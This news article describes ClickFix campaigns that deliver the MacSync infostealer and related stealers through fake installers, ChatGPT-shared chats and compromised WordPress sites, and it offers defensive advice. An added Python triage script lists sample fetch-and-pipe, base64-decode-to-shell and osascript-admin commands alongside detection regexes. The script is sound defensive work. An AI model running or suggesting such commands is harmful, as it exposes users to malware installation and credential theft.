Cybersecurity researchers have identified multiple ClickFix malware campaigns distributing a macOS information-stealing malware known as MacSync. The campaigns rely heavily on social engineering techniques that trick users into manually executing malicious commands in the macOS Terminal.
Security experts from Sophos explained that the attacks differ from traditional exploit-driven campaigns. Instead of exploiting software vulnerabilities, the attackers depend on user interaction, typically persuading victims to copy and paste obfuscated commands into the Terminal application.
This method is particularly dangerous because many users do not fully understand the risks of executing unfamiliar command-line instructions.
Multiple Campaigns Identified Since Late 2025
Researchers have documented three separate campaigns spreading MacSync malware between November 2025 and February 2026. It is not yet confirmed whether the same threat actor is responsible for all of them.
The first campaign appeared in November 2025 and used a fake version of the OpenAI Atlas browser as bait. Sponsored advertisements on Google redirected users to a malicious Google Sites page containing a download button. Clicking the button displayed instructions telling users to open the Terminal application and run a command.
Once executed, the command downloaded a shell script that requested the system password and installed the MacSync malware with standard user-level privileges.
Malvertising Campaign Leveraged ChatGPT Conversations
A second campaign was observed in December 2025 and relied on malicious search engine advertising. Attackers targeted users searching for phrases such as “how to clean up your Mac.”
Victims were directed to shared conversations on the legitimate ChatGPT website, making the links appear trustworthy. These conversations contained links that redirected users to fake GitHub-styled pages designed to convince them to run malicious commands inside the Terminal application.
New MacSync Variant Targets Global Users
In February 2026, researchers discovered a third campaign targeting users in Belgium, India, and several regions across North and South America. This operation distributed a more advanced version of the MacSync infostealer using ClickFix tactics.
The latest variant introduces several technical improvements, including:
- Support for dynamic AppleScript payloads
- In-memory execution to avoid detection
- Enhanced evasion techniques against security analysis
After execution, the shell script contacts a hard-coded command server to download the AppleScript-based infostealer payload. At the same time, it attempts to remove traces of its activity to conceal the data theft.
The malware is capable of stealing various types of sensitive information, including login credentials, files, keychain databases, and cryptocurrency wallet seed phrases.

ClickFix Attacks Exploit Trust in AI Platforms
Researchers believe attackers are adapting their tactics to bypass modern security protections. One strategy involves exploiting the trust users place in AI platforms such as ChatGPT.
By embedding malicious instructions within seemingly legitimate discussions or tutorials, attackers can trick users into executing commands that install malware on their systems.
InstallFix and GoogleFix Variants Expanding the Threat
Security researchers have also observed related social engineering attacks known as InstallFix or GoogleFix. These campaigns host fake installation guides for developer tools on legitimate platforms such as:
- Cloudflare Pages
- Squarespace
- Tencent EdgeOne
The malicious instructions often claim to install developer tools like Anthropic Claude Code, but instead deliver malware such as Amatera Stealer.
In some cases, similar attack chains deploy Alien infostealer on Windows systems or Atomic Stealer on macOS devices.
Developer Installation Patterns Help Hide Malware
One reason these attacks succeed is that developers frequently install software using command-line instructions such as curl | sh, which download and execute scripts automatically.
Many legitimate tools, including Homebrew, Rust, and Node Version Manager (nvm), use this installation pattern. Attackers take advantage of this familiarity, hiding malicious commands within what appear to be normal installation instructions.
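Because the same curl | sh habit is shared by legitimate installers and ClickFix lures, defenders tend to triage collected command lines rather than block the pattern outright. The following is an added illustration, not code from the article or from Sophos or Rapid7: a small heuristic scorer run over constructed sample command lines (as a shell-history or EDR collector might record them), with a placeholder allowlist of vetted installer hosts so that known-good installs do not drown out the suspicious ones.

```python
import base64
import re

# Constructed sample command lines, modelled on what a shell-history or EDR process
# collector might record on a Mac. None of these is a real ClickFix payload.
SAMPLE_COMMANDS = [
    "brew install wget",
    "curl -fsSL https://cdn.example.invalid/install.sh | sh",
    f"echo '{base64.b64encode(b'echo hi').decode()}' | base64 -D | bash",
    "osascript -e 'do shell script \"id\" with administrator privileges'",
    "curl -fsSL https://cdn.example.invalid/a.sh -o /tmp/a.sh && sudo sh /tmp/a.sh",
    "curl -fsSL https://installer.example.invalid/i.sh | sh",
    "ls -la ~/Documents",
]

# Placeholder allowlist (assumption): hosts your organisation already vets for curl | sh installs.
TRUSTED_HOSTS = {"installer.example.invalid"}
URL_RX = re.compile(r"https?://([A-Za-z0-9.-]+)")

# Heuristics named after the habits the article describes: fetch-and-pipe installs,
# decode-then-execute obfuscation, inline AppleScript, and privilege prompts next to a download.
HEURISTICS = [
    ("pipe_to_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("subshell_fetch", re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b")),
    ("base64_decode_exec", re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("osascript_admin", re.compile(r"\bosascript\b.*administrator privileges")),
    ("osascript_inline", re.compile(r"\bosascript\s+-e\b")),
    ("sudo_with_fetch", re.compile(r"\bsudo\b.*\b(curl|wget)\b|\b(curl|wget)\b.*\bsudo\b")),
]
FETCH_ONLY = {"pipe_to_shell", "subshell_fetch"}  # suppressed when every URL host is allowlisted


def score_command(cmd: str) -> dict:
    """Return the heuristic names that fire on one command line plus a simple score."""
    hits = [name for name, rx in HEURISTICS if rx.search(cmd)]
    hosts = URL_RX.findall(cmd)
    if hosts and all(h in TRUSTED_HOSTS for h in hosts):
        hits = [h for h in hits if h not in FETCH_ONLY]
    return {"command": cmd, "indicators": hits, "score": len(hits)}


def triage(commands, threshold: int = 1) -> list:
    """Keep command lines whose score reaches the threshold, highest score first."""
    flagged = [s for s in map(score_command, commands) if s["score"] >= threshold]
    return sorted(flagged, key=lambda s: s["score"], reverse=True)


if __name__ == "__main__":
    for entry in triage(SAMPLE_COMMANDS):
        print(f"{entry['score']}  {', '.join(entry['indicators']):<38}{entry['command']}")
```

Running it flags four of the seven constructed lines; the allowlisted curl | sh install scores zero while the same pattern against an unknown host is kept, which is the distinction the article's developer-habit point turns on.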
ClickFix Tactics Spread Across Multiple Malware Campaigns
The ClickFix technique has quickly become popular among cybercriminal groups. One example is a malicious traffic distribution system called KongTuke, also known by several aliases including 404 TDS, Chaya_002, LandUpdate808, and TAG-124.
This infrastructure uses compromised WordPress websites and fake CAPTCHA pages to distribute malware such as ModeloRAT, a Python-based remote access trojan.
In these attacks, malicious JavaScript embedded in legitimate websites instructs visitors to run a PowerShell command, which begins a multi-stage infection process.
WordPress Sites Weaponized in Global Campaign
A recent investigation by Rapid7 revealed that more than 250 compromised WordPress websites across 12 countries are being used in a large-scale ClickFix campaign.
Affected countries include:
Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the United Kingdom, and the United States.
Many of the infected websites belong to regional news outlets and local businesses, making the malicious pages appear trustworthy.
The campaign ultimately installs various data-stealing malware families on Windows systems, including:
- StealC Stealer
- Vidar-based stealers
- Impure Stealer
- VodkaStealer
Stolen data can then be used for financial fraud or further cyber attacks.

Protecting Against ClickFix Attacks
Security experts recommend that website administrators and users take proactive steps to reduce risk.
For website administrators, key defensive measures include:
- Keeping WordPress plugins and themes updated
- Using strong administrator passwords
- Enabling two-factor authentication
- Monitoring for unauthorized administrator accounts
For individual users, experts advise maintaining a cautious browsing mindset and avoiding the execution of unknown Terminal or PowerShell commands.
Researchers emphasize that even legitimate websites can become compromised and used as distribution points for malware.